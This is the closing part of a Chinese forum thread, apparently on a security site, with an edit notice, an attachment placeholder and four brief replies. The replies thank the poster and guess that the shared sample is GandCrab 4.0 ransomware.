最后于 2019-9-9 17:47 被小白鼠_897235编辑 ,原因:
上传的附件:
收藏
免费 2
支持
分享
最新回复 (4)
雪    币: 26398
活跃值: (63257)
能力值: (RANK:135 )
在线值:
发帖
回帖
粉丝
2
感谢分享~
2019-9-4 18:11
0
雪    币: 8057
活跃值: (2625)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
3
牛逼呀
2019-9-4 22:04
0
雪    币: 17428
活跃值: (5009)
能力值: ( LV9,RANK:450 )
在线值:
发帖
回帖
粉丝
4
是Gandcrad吧?
2019-9-5 09:56
0
雪    币: 7059
活跃值: (3091)
能力值: ( LV4,RANK:52 )
在线值:
发帖
回帖
粉丝
5
GandCrab4.0啊
2019-9-5 13:48
0
游客
登录 | 注册 方可回帖
返回
//